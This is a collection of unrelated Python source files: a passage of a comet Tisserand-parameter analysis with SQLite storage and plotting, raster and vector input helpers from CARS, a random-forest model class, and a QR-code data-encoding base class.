PERC_P_TYPE_JFCS = len(P_TYPE_DF.loc[(P_TYPE_DF["TISSERAND_JUP"] > 2) \
& (P_TYPE_DF["TISSERAND_JUP"] < 3)]) \
/ len(P_TYPE_DF.index) * 100
PERC_P_TYPE_JFCS = round(PERC_P_TYPE_JFCS, 0)
# Print how many P comets have a Tisserand parameter between 2 and 3:
print('Percentage of P type comets with a Tisserand parameter between ' \
f'2 and 3: {PERC_P_TYPE_JFCS}%')
print('\n')
# Print some descriptive statistics of the C type comets
print('Descriptive statistics of the Tisserand parameter of C type comets')
print(f'{C_TYPE_DF["TISSERAND_JUP"].describe()}')
print('\n')
#%%
# We define a function to add a new column in an already existing database
# table. This code snippet may be helpful in the future
def add_col2tab(con_db, cur_db, tab_name, col_name, col_type):
"""
This function adds a new column to an already existing SQLite table.
Setting a new or editing an existing key (primary or foreign) is not
possible.
Parameters
----------
con_db : sqlite3.Connection
Connection object to the SQLite database.
cur_db : sqlite3.Cursor
Connection corresponding cursor.
tab_name : str
Table name.
col_name : str
New column name that shall be added.
col_type : str
New column name corresponding SQLite column type.
Returns
-------
None.
"""
# Iterate through all existing column names of the database table using
# the PRAGMA table_info command
for row in cur_db.execute(f'PRAGMA table_info({tab_name})'):
# If the column exists: exit the function
if row[1] == col_name:
break
    # If the column does not exist yet, add the new column
else:
cur_db.execute(f'ALTER TABLE {tab_name} ' \
f'ADD COLUMN {col_name} {col_type}')
con_db.commit()
# Add a new column in the comets_main table for the Tisserand parameters
add_col2tab(con_db=con, \
cur_db=cur, \
tab_name='comets_main', \
col_name='TISSERAND_JUP', \
col_type='REAL')
#%%
# Add the Tisserand parameter results to the database
cur.executemany('UPDATE comets_main SET TISSERAND_JUP=? WHERE NAME=?', \
P_TYPE_DF[['TISSERAND_JUP', 'NAME']].values)
con.commit()
cur.executemany('UPDATE comets_main SET TISSERAND_JUP=? WHERE NAME=?', \
C_TYPE_DF[['TISSERAND_JUP', 'NAME']].values)
con.commit()
#%%
# Compute the KDE distribution for the Tisserand values, ranging from 0 to 5
TISSERAND_RANGE = np.linspace(0, 5, 1000)
# Kernel and distribution computation for the P type comets
P_TYPE_TISR_KERNEL = stats.gaussian_kde(P_TYPE_DF['TISSERAND_JUP'])
P_TYPE_TISR_DISTR = P_TYPE_TISR_KERNEL(TISSERAND_RANGE)
# Kernel and distribution computation for the C type comets
C_TYPE_TISR_KERNEL = stats.gaussian_kde(C_TYPE_DF['TISSERAND_JUP'])
C_TYPE_TISR_DISTR = C_TYPE_TISR_KERNEL(TISSERAND_RANGE)
#%%
# Square-root choice for the histograms number of bins
nr_of_bins = lambda data_array: int(np.floor(np.sqrt(len(data_array))))
# Let's set a dark background
plt.style.use('dark_background')
# Set a default font size for better readability
plt.rcParams.update({'font.size': 14})
# Create a figure and axis
fig, ax = plt.subplots(figsize=(12, 8))
# Histogram of the P and C type comets' Tisserand parameter.
ax.hist(P_TYPE_DF['TISSERAND_JUP'], \
bins=nr_of_bins(P_TYPE_DF['TISSERAND_JUP']), \
density=True, color='tab:orange', alpha=0.5, label='P Type')
ax.hist(C_TYPE_DF['TISSERAND_JUP'], \
bins=nr_of_bins(C_TYPE_DF['TISSERAND_JUP']), \
density=True, color='tab:blue', alpha=0.5, label='C Type')
# Plot the KDE of the P type comets
ax.plot(TISSERAND_RANGE, P_TYPE_TISR_DISTR, color='tab:orange', alpha=1, linestyle='solid')
# Plot the KDE of the C type comets
ax.plot(TISSERAND_RANGE, C_TYPE_TISR_DISTR, color='tab:blue', alpha=1, linestyle='solid')
# Set an x axis limits
ax.set_xlim(0, 5)
# Add a grid for better readability
ax.grid(axis='both', linestyle='dashed', alpha=0.2)
# Set an x and y label
ax.set_xlabel('Tisserand Parameter w.r.t. Jupiter')
ax.set_ylabel('Normalised Distribution')
# Re-define the opacity (alpha value) of the markers / lines in the
# legend for better visibility
leg = ax.legend(fancybox=True, loc='upper right', framealpha=1)
for lh in leg.legendHandles:
lh.set_alpha(1)
# Save the figure
plt.savefig('comets_kde_tisserand_jup.png', dpi=300)
|
cars/core/inputs.py
|
CNES/cars
| 134 |
123246
|
<gh_stars>100-1000
#!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2020 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of CARS
# (see https://github.com/CNES/cars).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Inputs module:
contains some CARS global shared general purpose inputs functions
"""
# Standard imports
import logging
import warnings
from typing import Tuple
# Third party imports
import fiona
import rasterio as rio
import xarray as xr
from json_checker import Checker
from shapely.geometry import shape
# Filter rasterio warning when image is not georeferenced
warnings.filterwarnings("ignore", category=rio.errors.NotGeoreferencedWarning)
def read_vector(path_to_file):
"""
Read vector file and returns the corresponding polygon
:raise Exception when the input file is unreadable
:param path_to_file: path to the file to open
:type path_to_file: str
:return: a shapely polygon
:rtype: tuple (polygon, epsg)
"""
try:
polys = []
with fiona.open(path_to_file) as vec_file:
_, epsg = vec_file.crs["init"].split(":")
for feat in vec_file:
polys.append(shape(feat["geometry"]))
except BaseException as base_except:
raise Exception(
"Impossible to read {} file".format(path_to_file)
) from base_except
if len(polys) == 1:
return polys[0], int(epsg)
if len(polys) > 1:
logging.info(
"Multi features files are not supported, "
"the first feature of {} will be used".format(path_to_file)
)
return polys[0], int(epsg)
logging.info("No feature is present in the {} file".format(path_to_file))
return None
def rasterio_get_nb_bands(raster_file: str) -> int:
"""
Get the number of bands in an image file
    :param raster_file: Image file
:returns: The number of bands
"""
with rio.open(raster_file, "r") as descriptor:
return descriptor.count
def rasterio_get_size(raster_file: str) -> Tuple[int, int]:
"""
Get the size of an image (file)
:param raster_file: Image file
:returns: The size (width, height)
"""
with rio.open(raster_file, "r") as descriptor:
return (descriptor.width, descriptor.height)
def rasterio_can_open(raster_file: str) -> bool:
"""
Test if a file can be open by rasterio
:param raster_file: File to test
:returns: True if rasterio can open file and False otherwise
"""
try:
rio.open(raster_file)
return True
except Exception as read_error:
logging.warning(
"Impossible to read file {}: {}".format(raster_file, read_error)
)
return False
def ncdf_can_open(file_path):
"""
Checks if the given file can be opened by NetCDF
:param file_path: file path.
:type file_path: str
:return: True if it can be opened, False otherwise.
:rtype: bool
"""
try:
with xr.open_dataset(file_path) as _:
return True
except Exception as read_error:
logging.warning(
"Exception caught while trying to read file {}: {}".format(
file_path, read_error
)
)
return False
def check_json(conf, schema):
"""
Check a dictionary with respect to a schema
:param conf: The dictionary to check
:type conf: dict
:param schema: The schema to use
:type schema: dict
:returns: conf if check succeeds (else raises CheckerError)
:rtype: dict
"""
schema_validator = Checker(schema)
checked_conf = schema_validator.validate(conf)
return checked_conf
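# Hedged usage sketch (added illustration, not part of the original module):
# a minimal json_checker schema run through check_json. The schema and the
# configuration dictionary below are invented examples.
if __name__ == '__main__':
    example_schema = {"name": str, "size": int}
    example_conf = {"name": "epipolar_tile", "size": 512}
    print(check_json(example_conf, example_schema))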
|
models/rfmodel.py
|
arp19690/AIAlpha
| 1,115 |
123295
|
<gh_stars>1000+
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import BaggingClassifier as BC
from sklearn.metrics import f1_score
from sklearn.metrics import log_loss
class RFModel:
def __init__(self, input_shape):
self.input_shape = input_shape
def make_model(self, n_estimators, n_jobs, verbose=1):
model1 = RF(n_estimators=1, criterion='entropy', bootstrap=False, class_weight='balanced_subsample')
self.model = BC(base_estimator=model1, n_estimators=n_estimators, max_features=1., verbose=verbose)
def train_model(self, x, y, sample_weights=None):
self.model.fit(x, y, sample_weight=sample_weights)
def test_model(self, x, y, sample_weights=None):
# model_acc = self.model.score(x, y, sample_weight=sample_weights)
# zeros_count = y['y_values'].value_counts().loc[0]
# null_acc = zeros_count/len(y)
y_true = pd.DataFrame(index=y.index)
y_true.loc[y['y_values'] == 1, 'up'] = 1
y_true.loc[y['y_values'] == -1, 'down'] = 1
y_true.loc[y['y_values'] == 0, 'no_ch'] = 1
y_true = y_true.fillna(0)
y_pred = self.model.predict_proba(x)
model_loss = log_loss(y_true, y_pred, sample_weight=sample_weights)
base_case = pd.DataFrame(index=y.index)
base_case['up'] = np.zeros(len(y))
base_case['down'] = np.zeros(len(y))
base_case['no_ch'] = np.ones(len(y))
base_loss = log_loss(y_true, base_case)
# print(f'Model accuracy: {model_acc}')
# print(f'Null accuracy: {null_acc}')
print(f'Model log loss: {model_loss}')
print(f'Base log loss: {base_loss}')
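# Hedged usage sketch (added illustration, not part of the original module).
# Random data stands in for engineered features and -1/0/1 labels; the
# 'y_values' column name follows the convention used by test_model above.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    x_demo = pd.DataFrame(rng.normal(size=(200, 5)))
    y_demo = pd.DataFrame({'y_values': rng.choice([-1, 0, 1], size=200)})
    demo = RFModel(input_shape=(5,))
    demo.make_model(n_estimators=10, n_jobs=1, verbose=0)
    demo.train_model(x_demo, y_demo['y_values'].values)
    demo.test_model(x_demo, y_demo)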
|
src/qrcode/pyqart/qr/data/base.py
|
lapinozz/ArtCoder
| 525 |
123305
|
# Added at : 2016.7.28
# Author : 7sDream
# Usage : A base data mode class for encoding data to bytes.
# All specific data models inherit from this class.
import abc
from ...common import Bits
from .exception import QrEncodingException
__all__ = ['BaseType']
class BaseType(object):
def __init__(self, data, cci_length):
"""
:param data: Data to be encoded
        :param int cci_length: length of the Char Count Indicator in bits
"""
assert len(data) > 0, 'Unable to encode empty data.'
self._data = data
self._cci_length = cci_length
self._validate()
@property
def data(self):
"""
:return: provided, raw original data
"""
return self._data
@property
@abc.abstractmethod
def _encoded_data_part_length(self):
return 0
@property
def needed_space(self):
return 4 + self._cci_length + self._encoded_data_part_length
@property
@abc.abstractmethod
def _mode_indicator(self):
"""
        :return: A 4-bit value indicating which encoding mode is in use;
            only the lower 4 bits are significant.
:rtype: int
"""
pass
@property
def _char_count_indicator(self):
"""
        :return: Placed before the encoded data to indicate the data length;
            its own length is decided by :any:`cci_length`.
:rtype: Bits
"""
bits = Bits()
bits.append(0, self._cci_length - len(self.data).bit_length())
bits.append(len(self.data), len(self.data).bit_length())
return bits
@abc.abstractmethod
def _validate(self):
"""
validate data, raise :any:`QrDataInvalidException`
if data is invalid, implemented by subclasses.
:raise: QrDataInvalidException
"""
pass
@property
@abc.abstractmethod
def _encoded_data_part(self):
"""
        Encode data to bits using the specific mode; implemented by subclasses.
:return: encoded data
:rtype: Bits
"""
pass
@property
def output(self):
"""
:return: Output encoded data.
:rtype: Bits
"""
bits = Bits()
bits.append(self._mode_indicator, 4)
bits.extend(self._char_count_indicator)
bits.extend(self._encoded_data_part)
if bits.length != self.needed_space:
raise QrEncodingException(
type(self), self.data,
info="Encoded data value_upper does not match expectations.",
exception=self.needed_space,
actual=bits.length,
)
return bits
def __str__(self):
mi = Bits()
mi.append(self._mode_indicator, 4)
cci = Bits()
cci.extend(self._char_count_indicator)
encoded_data = Bits()
encoded_data.extend(self._encoded_data_part)
string = "{type} at {id:x}: " \
"{{data: {data}, mi: {mi}, cci: {cci}, encode: {code}}}"
return string.format(
type=type(self).__name__, id=id(self),
data=self.data, mi=mi, cci=cci, code=encoded_data,
)
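# Hedged illustration (added, not part of the original package): a toy concrete
# mode that stores each character as one 8-bit byte, only to show how the
# abstract hooks of BaseType fit together. Real modes in this package follow
# the QR specification; this toy class does not.
class _ToyByteType(BaseType):
    @property
    def _mode_indicator(self):
        return 0b0100  # byte-mode-like indicator, chosen for illustration only

    @property
    def _encoded_data_part_length(self):
        return 8 * len(self.data)

    def _validate(self):
        # Toy rule: only plain ASCII text is accepted
        assert all(ord(c) < 128 for c in self.data), 'toy mode accepts ASCII only'

    @property
    def _encoded_data_part(self):
        bits = Bits()
        for c in self.data:
            bits.append(ord(c), 8)
        return bits

# Example (illustrative): _ToyByteType('Hi', cci_length=8).output yields
# 4 (mode) + 8 (char count) + 16 (data) = 28 bits.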
|